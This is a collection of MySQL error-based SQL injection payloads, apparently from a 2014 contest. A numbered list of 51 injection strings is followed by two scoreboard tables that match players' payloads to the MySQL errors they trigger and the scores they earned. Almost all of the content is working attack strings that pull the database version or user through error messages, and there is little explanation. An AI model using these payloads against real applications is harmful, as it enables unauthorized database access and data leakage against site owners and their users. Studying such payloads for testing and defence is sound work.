SQL error-based injection payloads

  1. '-(SELECT*FROM(SELECT name_const(version(),1),name_const(version(),1))a)#
  2. '=0 group by elt(rand(),version())having sum(0)#
  3. '-updatexml(0,repeat(version(),2),2)#
  4. '|polygon((select*from(select name_const(version(),1))x))#
  5. '--~(select*from(select@@version)f)#
  6. '|GTID_SUBSET(@@version,0)#
  7. '/(select*from(select+name_const(version(),1),name_const(version(),1))a)#
  8. '=0 group by elt(rand(),version())having min(0)#
  9. '/updatexml(0,repeat(version(),2),0)#
  10. '-polygon((select*from(select name_const(version(),1))o))#
  11. '/gtid_subset(@@version,0)#
  12. '|(select*from(select name_const(version(),1),name_const(version(),1))a)#
  13. '|updatexml(1,repeat(version(),2),1)#
  14. '<1 group by elt(rand(),version())having min(0)#
  15. '|polygon((select*from(select name_const(version(),1))p))#
  16. '|!(select*from(select@@version)x)-~0#
  17. 'or 1 group by concat(version(),floor(rand(0)*2)) having min(0)or''='
  18. ' and extractvalue(rand(0),concat(0x0a,version()))or''='
  19. '--~(select*from(select@@version)f)#
  20. '|(select!x-~0.FROM(select+version()x)f)#
  21. '|(select!x-~0.FROM(select@@version x)f)#
  22. 'UnIoN SeLeCt CoUnT(`TeXt`) FrOm test.news WhErE 1=1 GrOuP By CoNcAt(VeRsIoN(),FlOoR(RaNd(1337)*2)),'
  23. '-(select*from(select name_const(version(),1),name_const(version(),1))p)#
  24. '/updatexml(0,concat(0xa,version()),0)#
  25. '/updatexml(0,concat('$_',version()),0)#
  26. '-updatexml(1,concat('a=.',version()),1)#
  27. '-updatexml(1,LPAD(.1,999,hex(hex(version()))),1)#
  28. '/polygon((select*from(select name_const(version(),1))o))#
  29. '-~(select*from(select@@version)x)*2#
  30. 1e308'*(select*from(select@@version)x)#
  31. '-(select~b*a*a*a from(select~0/.1 a,version()b)x)#
  32. '-GTID_SUBSET(@@version,0)#
  33. '|updatexml(1,concat('a=.',version()),1)#
  34. '|updatexml(0,concat('$_',version()),2)#
  35. '-updatexml(0,concat(0x1,version()),2)#
  36. '|updatexml(0,lpad(.1,350,hex(hex(version()))),1)#
  37. '|(~(select*from(select@@version)f)*2)#
  38. '|~(select*from(select@@version)x)*cast(1e99as decimal(65))#
  39. '||1 group by mid(version(),rand())having min(1)#
  40. '|UpdateXML(1,concat('/',version()),1)#
  41. '|UpdateXML(1,concat('$_',version()),1)#
  42. '|ExtractValue(1,concat('/a[x=y]',version()))#
  43. '|Polygon((select*from(select name_const(version(),1))b))#
  44. '|UpdateXML(0,CONCAT(hex(hex(version())),repeat(0,285),'.'),1)#
  45. '|(select-9223372036854775808-(x||1)FROM(select+version()x)z)#
  46. '|(select pow(2,~x)FROM(select+version()x)z)#
  47. '|(select~0*cast(x as DECIMAL(1))*~0*~0*~0.FROM(select+version()x)z)#
  48. '|GTID_SUBSET(version(),0)#
  49. '||1 group by concat(left(version(),9),rand(0)|0) having max(0)#
  50. '-updatexml(1,concat('.a=a',version()),1)#
  51. |pow(bit_length((select*from(select user())a)),9999);
#NameXErrNoScoreSUM(Score)Last Submit
1@Black2Fan'-(SELECT*FROM(SELECT name_const(version(),1),name_const(version(),1))a)#1060564952014-10-01 08:55:54
'=0 group by elt(rand(),version())having sum(0)#106281
'-updatexml(0,repeat(version(),2),2)#110592
'|polygon((select*from(select name_const(version(),1))x))#136771
'--~(select*from(select@@version)f)#169093
'|GTID_SUBSET(@@version,0)#1772102
2kamior'/(select*from(select+name_const(version(),1),name_const(version(),1))a)#1060564952014-10-01 11:41:33
'=0 group by elt(rand(),version())having min(0)#106281
'/updatexml(0,repeat(version(),2),0)#110592
'-polygon((select*from(select name_const(version(),1))o))#136771
'--~(select*from(select@@version)f)#169093
'/gtid_subset(@@version,0)#1772102
3mb'|(select*from(select name_const(version(),1),name_const(version(),1))a)#1060563222014-09-17 20:03:18
'=0 group by elt(rand(),version())having min(0)#106281
'|updatexml(1,repeat(version(),2),1)#110592
'--~(select*from(select@@version)f)#169093
4snoopdogg'<1 group by elt(rand(),version())having min(0)#1062812432014-10-01 13:20:39
'|polygon((select*from(select name_const(version(),1))p))#136771
'|!(select*from(select@@version)x)-~0#169091
5ZiX'or 1 group by concat(version(),floor(rand(0)*2)) having min(0)or''='1062601332014-09-15 23:02:45
' and extractvalue(rand(0),concat(0x0a,version()))or''='110573
6123'--~(select*from(select@@version)f)#169093932014-09-16 19:44:00
7der'--~(select*from(select@@version)f)# 169092922014-09-15 20:37:58
8r'|(select!x-~0.FROM(select+version()x)f)#169088882014-09-15 19:49:35
9BlackFan'|(select!x-~0.FROM(select@@version x)f)#169088882014-10-01 14:08:20
10asdf'UnIoN SeLeCt CoUnT(`TeXt`) FrOm test.news WhErE 1=1 GrOuP By CoNcAt(VeRsIoN(),FlOoR(RaNd(1337)*2)),'106228282014-09-15 23:54:40
#NameXErrTextErrNoScoreSUM(Score)Last Submit
1snoopdogg'-(select*from(select name_const(version(),1),name_const(version(),1))p)#Duplicate column name10605610092014-10-04 21:35:30
'=0 group by elt(rand(),version())having min(0)#Duplicate entry106281
'/updatexml(0,concat(0xa,version()),0)#XPATH syntax error:110590
'/updatexml(0,concat('$_',version()),0)#Unknown XPATH variable at:110589
'-updatexml(1,concat('a=.',version()),1)#XPATH error: comparison of two nodesets is not supported:110588
'-updatexml(1,LPAD(.1,999,hex(hex(version()))),1)#Illegal double136779
'/polygon((select*from(select name_const(version(),1))o))#Illegal non geometric136771
'--~(select*from(select@@version)f)#BIGINT value is out of range in169093
'-~(select*from(select@@version)x)*2#BIGINT UNSIGNED value is out of range in169092
1e308'*(select*from(select@@version)x)#DOUBLE value is out of range in169090
'-(select~b*a*a*a from(select~0/.1 a,version()b)x)#DECIMAL value is out of range in169078
'-GTID_SUBSET(@@version,0)#Malformed GTID set specification1772102
2@Black2Fan'-(SELECT*FROM(SELECT name_const(version(),1),name_const(version(),1))a)#Duplicate column name1060569982014-10-02 09:04:38
'=0 group by elt(rand(),version())having sum(0)#Duplicate entry106281
'|updatexml(1,concat('a=.',version()),1)#XPATH error: comparison of two nodesets is not supported:110588
'|updatexml(0,concat('$_',version()),2)#Unknown XPATH variable at:110589
'-updatexml(0,concat(0x1,version()),2)#XPATH syntax error:110590
'|updatexml(0,lpad(.1,350,hex(hex(version()))),1)#Illegal double136779
'|polygon((select*from(select name_const(version(),1))x))#Illegal non geometric136771
1e308'*(select*from(select@@version)x)#DOUBLE value is out of range in169090
'--~(select*from(select@@version)f)#BIGINT value is out of range in169093
'|(~(select*from(select@@version)f)*2)#BIGINT UNSIGNED value is out of range in169090
'|~(select*from(select@@version)x)*cast(1e99as decimal(65))#DECIMAL value is out of range in169069
'|GTID_SUBSET(@@version,0)#Malformed GTID set specification1772102
3zuzzz'|(select*from(select name_const(version(),1),name_const(version(),1))a)#Duplicate column name1060569362014-10-03 08:35:45
'||1 group by mid(version(),rand())having min(1)#Duplicate entry106280
'|UpdateXML(1,concat('/',version()),1)#XPATH syntax error:110590
'|UpdateXML(1,concat('$_',version()),1)#Unknown XPATH variable at:110589
'|ExtractValue(1,concat('/a[x=y]',version()))#XPATH error: comparison of two nodesets is not supported:110583
'|Polygon((select*from(select name_const(version(),1))b))#Illegal non geometric136771
'|UpdateXML(0,CONCAT(hex(hex(version())),repeat(0,285),'.'),1)#Illegal double136766
'|(select!x-~0.FROM(select+version()x)f)#BIGINT UNSIGNED value is out of range in169088
'|(select-9223372036854775808-(x||1)FROM(select+version()x)z)#BIGINT value is out of range in169067
'|(select pow(2,~x)FROM(select+version()x)z)#DOUBLE value is out of range in169084
'|(select~0*cast(x as DECIMAL(1))*~0*~0*~0.FROM(select+version()x)z)#DECIMAL value is out of range in169060
'|GTID_SUBSET(version(),0)#Malformed GTID set specification1772102
4yarbabin'||1 group by concat(left(version(),9),rand(0)|0) having max(0)#Duplicate entry1062651532014-10-03 10:07:48
'|(select!x-~0.FROM(select+version()x)f)#BIGINT UNSIGNED value is out of range in169088
5lel'-updatexml(1,concat('.a=a',version()),1)#XPATH syntax error:110587872014-10-01 17:12:36
6Karnalzi'union select count(*)from test.news group by concat(version(),floor(rand(9)*3)),'Duplicate entry106247472014-10-02 14:32:30
7xxxx' UnIoN SeLeCt CoUnT(`TeXt`) FrOm `test`.`news`  group By CoNcAt(version(), rand(RaNd(4) * 2)), 'Duplicate entry106232322014-10-01 16:55:06
8Nytro' union select count(*) From `test`.`news` where 1 group by concat(version(),floor(rand(1337)* 2)), 'Duplicate entry106228282014-10-02 11:50:06
9karnalzi'union all select count(*)from test.news where id=1 or 1=1 group by concat (version(),floor(rand(1337)*2)),'Duplicate entry106221212014-10-03 09:09:11
10X' UnIoN AlL SeLeCt CoUnT(`TeXt`) FrOm `test`.`news` WhErE 1 = 1 GrOuP By CoNcAt(VeRsIoN(), FlOoR(RaNd(1337) * 2)), 'Duplicate entry106213132014-10-02 11:47:23